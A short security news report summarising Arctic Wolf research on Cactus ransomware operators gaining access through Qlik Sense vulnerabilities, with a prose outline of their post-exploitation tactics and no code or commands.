Cactus Ransomware Strikes Through Qlik Sense Vulnerabilities

Through exploiting vulnerabilities in the Qlik Sense application, operators of the Cactus ransomware successfully gained initial access, paving the way for the deployment of their ransomware. Ongoing incident response investigations conducted by Arctic Wolf Labs' forensic and threat intelligence researchers reveal insights into this developing cyber threat. The exploitation of Qlik vulnerabilities, including CVE-2023-41266 for path traversal, CVE-2023-41265 for an HTTP Request Tunneling vulnerability, and CVE-2023-48365 for unauthenticated remote code execution, provided the ransomware operators with initial access. In the following post-exploitation phase Arctic Wolf researchers note, "the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes."

The intrusion unfolds with the exploitation of native Windows processes such as PowerShell or BitsAdmin, enabling the download of payloads for remote access tools like AnyDesk or Plink, often with the executables being renamed. Preceding the ransomware deployment, operators executed discovery commands, uninstalled security monitoring tools like Sophos, changed the administrator account password, and utilized the downloaded and renamed Plink executable to establish an RDP tunnel. Additionally, the threat actors employed Rclone for data exfiltration. Arctic Wolf emphasizes the ongoing nature of their incident response investigation while attributing the activities to Cactus ransomware operators, based on the observed overlaps in tactics, techniques, and procedures (TTPs) that ultimately culminated in the deployment of Cactus ransomware.